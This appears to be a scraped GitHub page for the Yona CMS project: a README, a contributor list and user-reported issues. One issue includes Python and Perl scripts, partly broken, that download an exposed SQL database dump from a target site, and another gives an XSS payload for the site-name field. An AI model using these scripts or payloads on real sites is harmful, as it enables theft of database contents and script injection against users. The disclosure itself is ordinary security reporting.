alexander-torosh / yona-cms

CMS based on Phalcon PHP Framework with modular structure

Home Page: http://yonacms.com/

License: Other

PHP 76.26% Volt 13.60% HTML 2.89% CSS 1.95% JavaScript 5.29%
phalcon phalcon-php yona-cms phalcon-php-framework php

yona-cms's Introduction

Yona CMS

Yona CMS is an open source content management system (CMS), written with the Phalcon PHP Framework (version 3.x supported).

It has a convenient modular structure and a simple configuration and architecture, and it can be easily modified for any task with any load.

Project website

New Modern Yona CMS 2 with Phalcon 4.0 and PHP 7.3

Check the ongoing development process in the branch v2.0.0.

PHP 7 support, Docker

To use the complete Docker stack, check the branch php7.0.

Installation

Composer

Run

composer create-project oleksandr-torosh/yona-cms -s dev

Or create a composer.json file and install the dependencies:

{
    "require": {
        "oleksandr-torosh/yona-cms": "dev-master"
    }
}

composer install

After some time, do not forget to run composer update to update the dependencies:

composer update

Composer is required. It will install the required libraries. If you get an error about the autoload.php file, the reason is a missed composer update installation step.

How to install Composer

Permissions

chmod a+w data -R
chmod a+w public/assets -R
chmod a+w public/img -R
chmod a+w public/robots.txt

Nginx

Example configuration for php-fpm + nginx. The APPLICATION_ENV parameter has the value “development”. Don’t forget to remove it on a production server.

server {

    listen   80;
    server_name yona-cms.dev;

    index index.php;
    set $root_path '/var/www/yona-cms/public';
    root $root_path;

    try_files $uri $uri/ @rewrite;

    location @rewrite {
        rewrite ^/(.*)$ /index.php?_url=/$1;
    }

    location ~ \.php {
        fastcgi_pass unix:/var/run/php5-fpm.sock;
        # fastcgi_pass 127.0.0.1:9000;

        fastcgi_index index.php;

        include /etc/nginx/fastcgi_params;

        fastcgi_split_path_info       ^(.+\.php)(/.+)$;
        fastcgi_param PATH_INFO       $fastcgi_path_info;
        fastcgi_param APPLICATION_ENV "development";
        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
    }

    location ~* ^/(css|img|js|flv|swf|download)/(.+)$ {
        root $root_path;
    }

    location ~ /\.ht {
        deny all;
    }

}

Apache

The .htaccess files are already configured.

Admin dashboard

Open http://yona-cms/admin and log in:

  • login: yona
  • password: yonacmsphalcon

Change the admin user password and delete the yona user.

Database

Edit /app/config/environment/development.php and set up the database connection. Import the MySQL dump file yona-cms.sql.

Phinx migrations

https://phinx.org/ is a library for creating, executing and rolling back migrations.

Creating a migration class in /data/migrations

php vendor/bin/phinx create NewMigrationName

Status

php vendor/bin/phinx -e development status

Executing new migrations

php vendor/bin/phinx -e development migrate

Rollback

php vendor/bin/phinx -e development rollback

You can set the default environment for your localhost user

sudo nano ~/.bashrc

Add the line

export PHINX_ENVIRONMENT=development

Features

  • Yona CMS saves a lot of time in starting necessary basic functionality for any project
  • The modular structure with a convenient hierarchy that is based on namespaces
  • Each module can serve as a separate independent component with its own routes, helpers, CSS and JS assets
  • Multi-lingual. Manage an unlimited number of languages and translations directly from admin
  • Yona CMS is really fast!

The current version and updates are listed in CHANGELOG.md.

Requirements

  • php 5.6+
  • phalcon 3.0.0+
  • mysql
  • php-intl
  • apache (+mod_rewrite) or nginx

yona-cms's People

Contributors

afbora, alexander-torosh, aydancoskun, djavolak, drnasin, geekup-khanhtq, geo-i, htejeda, longnz, pletsky, scrutinizer-auto-fixer, sergeyklay, thinhvoxuan, xboston, zikezhang

yona-cms's Issues

Volt compile path error

*.volt.php files are created in the same directory where the *.volt files are placed.
Fixed in the last commit.

Tree hierarchy?

Hi, do you have an implementation of a tree hierarchy? For example, for a shop.

not support php7

On a Debian system, the php7-intl extension is not found.
I like yona-cms very much, but I can't use it with PHP 7.

composer create-project fail on ext-phalcon

I have a working version of Phalcon 2.0.10 on my CentOS 6 (64-bit) WebFaction server using PHP v. 5.6 (other Phalcon projects are working fine).

When I try to install yona-cms via
composer create-project oleksandr-torosh/yona-cms -s dev

It stops with

Problem 1

  • The requested PHP extension ext-phalcon >=1.3.4 is missing from your system. Install or enable PHP's phalcon extension.

My php.ini file contains:
extension_dir = /home/myProject/php56-exts
extension = phalcon.so

I tried copying the php.ini file into the yona-cms directory, editing the composer.json phalcon required line to:

"ext-phalcon": "*",

and

composer install from within the yona-cms directory, but I get the same error.

Any suggestions for what I would need to do to get this working?

contact

oleksander my emails keep getting back as undelivered. can you contact me from another account?

Some flash messages have html such as "<b>yona</b>"

Admin -> Manager users -> Edit a user -> Save user
Flash message is displayed with html
"User <b>yona</b> has been saved"

Seems like around phalcon 2.1, autoescaping was added to Flash messages to mitigate potential XSS attacks.

While "$flash->setAutoescape(false);" could be added in Bootstrap.php to allow HTML, etc, every instance of a Flash message that is built from variables would have to be escaped.
It is less error prone to continue autoescaping all Flash messages.

A custom Flash component could also be created to parse out some common escaped html and replace with non escaped html.

But for simplicity, instead of trying to highlight words using html, use another common notation, such as brackets
"User [yona] has been saved"

Changing url when session time out (question)

Hi,

First, great work on yona. Very helpful. I am new to phalcon and yona. But keen to dig deeper. I have been building a small learning project using yona and so far so good. Works great. The only struggle I have is changing the admin log after session timeout to something else. I am trying to build a two layer user (frontend & backend) site. Can someone kindly hint me which part of the code I should be looking at please? I can't figure it out myself. Many thanks.

Unexpected rendering

Views rendered in wrong order. You could see the result here (if link will be unavailable, see screenshot below).
Phpinfo's information could be found here.
It looks really weird, because the same instance on a local server works as expected.
2017-08-22_173123

Fatal error: Call to a member function delete() on null

I edited a page in the admin CMS and it shows this error:

Fatal error: Call to a member function delete() on null in <my_path>/app/modules/Page/Model/Page.php on line 56

  • It still updates in the database
  • It looks like something is wrong in the delete function in Application\Cache\Manager

Router not working!

I access link "url/admin" but display content of Index controller. I think it direct to login page

Can not create or move node in tree category

Firstly, I use PostgreSQL 9.6 and your file seems older. Can you back up a new version please, because each time I try to execute the SQL query, it has an error at line 755 (Copy new record to admin_user table).

Secondly, I have also tried with MySQL, but I cannot move or add a new node. I can only rename a node.

Can you help me with this?

Demo

Hi,

Your demo and documentations are not working ?!

Can you check ?
Thanks

Cannot save pages ?

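I've made a little fix in Page.php

// Assumes these imports at the top of Page.php:
//   use Phalcon\Validation;
//   use Phalcon\Validation\Validator\Uniqueness as UniquenessValidator;
public function validation()
{
    // Wrap the validators in a Phalcon\Validation object, which validate() expects
    $validator = new Validation();

    $validator->add('slug', new UniquenessValidator(
        [
            "model"   => $this,
            "message" => $this->getDi()->get('helper')->translate("Page with slug is already exists")
        ]
    ));

    return $this->validate($validator);
}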

A few docker branch bugs

This is to make the docker install work:

  1. Copying nginx conf from nowhere, should be: cp /var/www/yona-cms/docker/etc/nginx/conf.d/yona.conf /etc/nginx/conf.d/yona.conf after git clone and workdir is set to /var/www
  2. root path is wrong in yona.conf, is /varwww/yona-cms/public; should be /var/www/yona-cms/public;
  3. php5-mysql is missing apt-get install php5-mysql
  4. php5-fpm need proper nginx user usermod -a -G www-data nginx
  5. php5-gd is missing apt-get install php5-gd

Also, it seems semantic-ui is missing from default template (should it be?).

And i see this in the source, what is it used for?
https://api.github.com/repos/oleksandr-torosh/yona-cms?callback=callback

YonaCMS Software 1.3.2 Database Disclosure

###########################################################################

Impact :

  • The product stores sensitive information in files or directories that are accessible to actors outside of the intended control sphere.

  • An information exposure is the intentional or unintentional disclosure of information to an actor that is not explicitly authorized to have access to that information.

  • phpMyAdmin is a free software tool written in PHP, intended to handle the administration of MySQL over the World Wide Web. It can be used to dump a database or a collection of databases for backup or transfer to another SQL server (not necessarily a MySQL server). The dump typically contains SQL statements to create the table, populate it, or both. This file contains a phpMyAdmin SQL dump. This information is highly sensitive and should not be found on a production system.

  • It looks like this file contains a database backup/dump. Acunetix inferred this filename from the domain name. A database backup contains a record of the table structure and/or the data from a database and is usually in the form of a list of SQL statements. A database backup is most often used for backing up a database so that its contents can be restored in the event of data loss. This information is highly sensitive and should never be found on a production system.

Remediation : Sensitive files such as database backups should never be stored in a directory that is accessible to the web server. As a workaround, you could restrict access to this file.

###########################################################################

Installation


Composer
Run

composer create-project oleksandr-torosh/yona-cms -s dev
Or create composer.json file and install dependencies:

{
"require": {
"oleksandr-torosh/yona-cms": "dev-master"
}
}
composer install
After some time, do not forget run composer update for update dependencies:

composer update
Composer is required. It will install required libraries.
If you have error with autoload.php file, the reason - missed composer update installation step.

How to install Composer =>

getcomposer.org/doc/00-intro.md#installation-linux-unix-osx

Admin dashboard
Open http://yona-cms/admin and auth:

login: yona
password: yonacmsphalcon
Change admin user password and delete yona user.

Database
Edit /app/config/environment/development.php and setup
database connection. Import MySQL dump file yona-cms.sql

Requirements
php 5.6+
phalcon 3.0.0+
mysql
php-intl
apache (+mod_rewrite) or nginx

###########################################################################

File :


/yona-cms.sql

-- phpMyAdmin SQL Dump
-- version 3.4.11.1deb2+deb7u1
-- phpmyadmin.net

-- Host: localhost
-- Server version: 5.6.23
-- PHP Version: 5.6.10-1~dotdeb+7.3
-- Database: yona-cms

github.com/alexander-torosh/yona-cms/raw/master/yona-cms.sql

File :


/yona_cms_postgres.sql

-- PostgreSQL database dump
-- Dumped from database version 9.4.8
-- Dumped by pg_dump version 9.4.8

raw.githubusercontent.com/alexander-torosh/yona-cms/master/yona_cms_postgres.sql

###########################################################################

Database Disclosure Information Exposure Exploit 1 :


#!/usr/bin/python
import string
import re
from urllib2 import Request, urlopen
disc = "/yona-cms.sql"
url = raw_input ("URL: ")
req = Request(url+disc)
rta = urlopen(req)
print "Result"
html = rta.read()
rdo = str(re.findall("resources.=", html))
print rdo
exit

###########################################################################

Database Disclosure Information Exposure Exploit 2 :


#!/usr/bin/perl -w

# Author : KingSkrupellos
# Team : Cyberizm Digital Security Army

use LWP::Simple;
use LWP::UserAgent;

system('cls');
system('YonaCMS Software Database Disclosure Exploit');
system('color a');

if(@argv < 2)
{
print "[-]How To Use\n\n";
&help; exit();
}
sub help()
{
print "[+] usage1 : perl $0 site.com /path/ \n";
print "[+] usage2 : perl $0 localhost / \n";
}
($TargetIP, $path, $File,) = @argv;

$File="yona-cms.sql";
my $url = "http://" . $TargetIP . $path . $File;
print "\n Wait Please Dear Hacker!!! \n\n";

my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($url,":content_file" => "D:/yona-cms.sql");

if ($request->is_success)
{
print "[+] $url Exploited!\n\n";
print "[+] Database saved to D:/yona-cms.sql\n";
exit();
}
else
{
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";
exit();
}
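A defender-side check for the exposure reported above, as an added example that is not part of the original report or of Yona CMS: it walks a document root and flags files carrying the dump banners quoted in the report. The function name, the extension list and the sample tree are assumptions, and the script needs PHP 7 or later.

```php
<?php
// Added example (not Yona CMS code): audit a web document root for database
// dump files such as the yona-cms.sql described in the report above.

/** Banner lines that identify a dump; both appear in the files quoted above. */
const DUMP_SIGNATURES = [
    '-- phpMyAdmin SQL Dump',
    '-- PostgreSQL database dump',
];

/**
 * Return the files under $docRoot that look like database dumps,
 * as an array of path => reason, sorted by path.
 */
function findExposedDumps(string $docRoot): array
{
    $findings = [];
    $files = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($docRoot, FilesystemIterator::SKIP_DOTS),
        RecursiveIteratorIterator::LEAVES_ONLY,
        RecursiveIteratorIterator::CATCH_GET_CHILD // skip unreadable directories
    );
    foreach ($files as $file) {
        if (!$file->isFile() || !$file->isReadable()) {
            continue;
        }
        $path = $file->getPathname();
        // Read only the first 4 KiB: dump tools write their banner at the top.
        $head = (string) file_get_contents($path, false, null, 0, 4096);
        foreach (DUMP_SIGNATURES as $signature) {
            if (strpos($head, $signature) !== false) {
                $findings[$path] = "header contains '$signature'";
                continue 2; // banner match is conclusive, go to the next file
            }
        }
        // Fallback for dumps without a known banner (assumed extension list).
        if (preg_match('/\.(sql|dump|bak)(\.gz)?$/i', $path)) {
            $findings[$path] = 'dump-like file extension';
        }
    }
    ksort($findings);
    return $findings;
}

// Constructed sample tree: a project root holding a dump next to public/.
$root = sys_get_temp_dir() . '/yona-audit-' . bin2hex(random_bytes(4));
mkdir("$root/public", 0700, true);
file_put_contents("$root/public/index.php", "<?php echo 'ok';\n");
file_put_contents("$root/yona-cms.sql", "-- phpMyAdmin SQL Dump\n-- Database: yona-cms\n");
file_put_contents("$root/backup.txt", "-- PostgreSQL database dump\n");

// Serving the project root exposes two files; serving public/ exposes none.
foreach ([$root, "$root/public"] as $docRoot) {
    $hits = findExposedDumps($docRoot);
    printf("%s: %d finding(s)\n", $docRoot, count($hits));
    foreach ($hits as $path => $reason) {
        printf("  %s (%s)\n", $path, $reason);
    }
}

// Remove the constructed sample tree again.
array_map('unlink', ["$root/public/index.php", "$root/yona-cms.sql", "$root/backup.txt"]);
rmdir("$root/public");
rmdir($root);
```

Run it from the command line against the directory your nginx root or Apache DocumentRoot points at; with the README's nginx example that is /var/www/yona-cms/public.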

[php7.0] db and php won't start on docker-compose up

➜  yona-cms git:(php7.0) docker-compose up                   
Starting yona-cms-phpmyadmin ... 
Starting yona-cms-mysql ... done
Starting yona-cms-php7 ... done
Starting yona-cms-www ... done
Attaching to yona-cms-phpmyadmin, yona-cms-mysql, yona-cms-php7, yona-cms-www
yona-cms-phpmyadmin | 2018-04-18 22:47:29,962 CRIT Supervisor running as root (no user in config file)
yona-cms-phpmyadmin | 2018-04-18 22:47:29,963 WARN Included extra file "/etc/supervisor.d/nginx.ini" during parsing
yona-cms-phpmyadmin | 2018-04-18 22:47:29,966 WARN Included extra file "/etc/supervisor.d/php.ini" during parsing
yona-cms-phpmyadmin | 2018-04-18 22:47:29,985 INFO RPC interface 'supervisor' initialized
yona-cms-phpmyadmin | 2018-04-18 22:47:29,991 CRIT Server 'unix_http_server' running without any HTTP authentication checking
yona-cms-mysql | Initializing database
yona-cms-mysql | mkdir: cannot create directory '/var/lib/mysql//mysql': Permission denied
yona-cms-mysql | Fatal error Can't create database directory '/var/lib/mysql//mysql'
yona-cms-mysql | 
yona-cms-mysql | The latest information about mysql_install_db is available at
yona-cms-mysql | https://mariadb.com/kb/en/installing-system-tables-mysql_install_db
yona-cms-mysql exited with code 1
yona-cms-phpmyadmin | 2018-04-18 22:47:29,994 INFO supervisord started with pid 1
yona-cms-phpmyadmin | 2018-04-18 22:47:30,997 INFO spawned: 'php-fpm' with pid 13
yona-cms-php7 | [18-Apr-2018 22:47:31] ERROR: Unable to create the PID file (/run/php/php7.1-fpm.pid).: No such file or directory (2)
yona-cms-php7 | [18-Apr-2018 22:47:31] ERROR: FPM initialization failed
yona-cms-php7 exited with code 78
yona-cms-phpmyadmin | 2018-04-18 22:47:30,999 INFO spawned: 'nginx' with pid 14
^CGracefully stopping... (press Ctrl+C again to force)
Stopping yona-cms-www        ... done
Stopping yona-cms-phpmyadmin ... done

Install on Xampp error

If I install yonacms on XAMPP, .htaccess does not seem to work right.

The site can't be loaded with CSS, and running localhost/yonacms/admin gets an error.

Phalcon\Mvc\Model::validate() must implement interface

Catchable fatal error: Argument 1 passed to Phalcon\Mvc\Model::validate() must implement interface Phalcon\ValidationInterface, instance of Phalcon\Mvc\Model\Validator\Uniqueness given in F:\wamp\www\yona-cms\app\modules\Admin\Model\AdminUser.php on line 51

your demo page is hacked, can we trust?

Hi, I'm sure you noticed that your demo page is hacked. Do you realize what's wrong? Is this Yona's fault or Phalcon's? Or maybe the server itself.

Is this production ready or not?

IndexController handler class cannot be loaded on the 404 page

http://demo.yonacms.com/none-page

404

Страница не найдена

IndexController handler class cannot be loaded

/var/www/clients/client8/web243/private/app/Bootstrap.php::263

#0 [internal function]: Phalcon\Mvc\Dispatcher->_throwDispatchException('IndexController...', 2)
#1 /var/www/clients/client8/web243/private/app/Bootstrap.php(263): Phalcon\Dispatcher->dispatch()
#2 /var/www/clients/client8/web243/private/app/Bootstrap.php(230): Bootstrap->dispatch(Object(Phalcon\DI\FactoryDefault))
#3 /var/www/clients/client8/web243/web/index.php(28): Bootstrap->run()
#4 {main}

macro problem.

{%- macro leaf_item(leaf, url) %}
    <li id="category_{{ leaf.getId() }}">
        <div class="item">
            <span class="title">{{ leaf.getTitle() }}</span>
            <span class="info">({{ leaf.getSlug() }})</span>
            <a href="{{ url }}category/admin/edit/{{ leaf.getId() }}"><i class="icon edit"></i></a>
            <a href="javascript:void(0);" onclick="deleteCategory({{ leaf.getId() }}, this)" class="delete"><i class="icon trash"></i></a>
        </div>
        {% if leaf.hasChildren() %}
            <ol>
                {% for child in leaf.children() %}
                    {{ leaf_item(child, url) }}
                {% endfor %}
            </ol>
        {% endif %}
    </li>
{%- endmacro %}

<div class="ui blue segment">
    You can drag and drop tree elements to change order and relations
</div>

{% for root, root_title in roots %}
    <div class="ui blue segment">
        <h3>{{ root_title }}</h3>

        <ol class="sortable" id="root_{{ root }}">

            {% set tree = category_helper.treeUpperLeafs(root) %}
            {% for leaf in tree %}
                {{ leaf_item(leaf, url.get()) }}
            {% endfor %}

        </ol>

        <a class="save ui button primary" id="save-root-{{ root }}" data-root="{{ root }}">
            <i class="save icon"></i> Save
        </a>
        <a href="javascript:void(0);" data-root="{{ root }}" class="add ui button positive">
            <i class="icon plus"></i> Add
        </a>
    </div>
{% endfor %}

{{ stylesheet_link("vendor/jquery-ui-1.11.4/jquery-ui.min.css") }}
{{ javascript_include("vendor/jquery-ui-1.11.4/jquery-ui.min.js") }}
{{ javascript_include("vendor/js/jquery.mjs.nestedSortable.js") }}

The file is /modules/Tree/views/admin/index.volt

Fresh install, and it was working last week; I haven't updated any code.

Error 500 internal server error

I use this conf on my nginx server. On days 1 and 2 it was fine; on day 3 I got this error with this conf:

server {
listen 80;
server_name www.web.com;
rewrite ^(.*) http://web.com$1 permanent;
}

server {
listen 80;
server_name web.com;

# root directive should be global
root   /usr/share/nginx/html/web/public/;

index  index.php;

    charset         utf-8;

    rewrite_log     on;
    client_max_body_size 5M;

    # Very Important
    underscores_in_headers on;

access_log /usr/share/nginx/html/log/access.log;
error_log /usr/share/nginx/html/log/error.log;

location / {
    index   index.php;

            if (-f $request_filename) {
                    break;
            }

            if (!-e $request_filename) {
                    rewrite ^(.+)$ /index.php?_url=$1 last;
                    break;
            }
}

error_page  404              /index.php;

# redirect server error pages to the static page /50x.html
#
error_page   500 502 503 504  /index.php;
location = index.php {
    root   /usr/share/nginx/html;
}

 location ~ \.php$ {
            fastcgi_pass 127.0.0.1:9000;
            #fastcgi_pass   unix:/tmp/php-fpm.sock;

            fastcgi_index   index.php;

            include /etc/nginx/fastcgi_params;
            include /etc/nginx/pagespeed_filters.conf;

            fastcgi_split_path_info         ^(.+\.php)(/.+)$;
            fastcgi_param PATH_INFO         $request_uri;
            fastcgi_param SCRIPT_TRANSLATED $document_root$fastcgi_path_info;
            fastcgi_param SCRIPT_FILENAME   $document_root$fastcgi_script_name;

            fastcgi_param APPLICATION_ENV "development";

            fastcgi_buffers         256 16k;
}

}

And when I look in my error log I find this:

PHP message: PHP Fatal error: require_once(): Failed opening required '/usr/share/nginx/html/web/public/../app/../vendor/autoload.php' (include_path='.:/usr/share/pear:/usr/share/php') in /usr/share/nginx/html/web/app/Bootstrap.php on line 32" while reading response header from upstream, client: 68.180.228.173, server: qawwam.com, request: "GET /category/17/ngetwit HTTP/1.1", upstream: "fastcgi://127.0.0.1:9000", host: "qawwam.com"

Cannot use String as class name (Composer + PHP 7)

Hello, I am getting this error during installation via Composer.

Fatal error: Cannot use 'String' as class name as it is reserved in phar://C:/ProgramData/ComposerSetup/bin/composer.phar/vendor/justinrainbow/json-schema/src/JsonSchema/Constraints/String.php on line 18

Phalcon: 3.0.1
PHP 7.0.9

I am not sure which one needs to be updated.

Meta-desc/title/key missing

For the Meta-Description , Title and Keyword the fields are missing and cannot be updated. I have tried cloning the master source on 3 computers and still the meta tags cannot be updated. They always output as null.

[Feature] Page layout

Each page might have different layouts. Each layout should be a combination of page contents, widgets, sliders.

XSS in meta

Enter this in SITE NAME (I did not check the others) and voilà:

Yona <b>CMS</b></title><script>alert('Ай-ай-аааай!')</script><title>Еще один title!

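The escaping that this report and the earlier flash-message issue both call for, as an added example in plain PHP (not Yona CMS or Phalcon code): every interpolated value is escaped while the fixed template keeps its markup. The helpers e(), flashHtml() and renderTitle() are hypothetical names, and the sample values are constructed from the ones in the two issues.

```php
<?php
// Added example, not Yona CMS or Phalcon code. Plain PHP (7+) so it runs
// without the Phalcon extension; all helper names are hypothetical.

/** Escape a value for HTML text or a quoted attribute value. */
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/**
 * Build a flash message whose fixed template may contain markup while every
 * interpolated value is escaped. This is the per-variable escaping needed
 * once autoescaping of flash messages is switched off.
 */
function flashHtml(string $template, string ...$values): string
{
    return vsprintf($template, array_map('e', $values));
}

/** Render the <title> element from the configured site name. */
function renderTitle(string $siteName): string
{
    return '<title>' . e($siteName) . '</title>';
}

// SITE NAME value modelled on the "XSS in meta" report (constructed, shortened).
$siteName = "Yona <b>CMS</b></title><script>alert('x')</script><title>";

// Unescaped, the value closes <title> and injects a script element.
echo 'unescaped: <title>' . $siteName . "</title>\n";
// Escaped, the same value stays inert text inside a single <title>.
echo 'escaped:   ' . renderTitle($siteName) . "\n";

// Flash message from the admin "Save user" issue with a constructed login:
// the template's <b> survives, the markup inside the login does not.
$login = 'yona</b><script>alert(1)</script>';
echo flashHtml('User <b>%s</b> has been saved', $login) . "\n";
```

In Volt templates the same escaping is applied with the `e` filter, for example `{{ value|e }}`.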
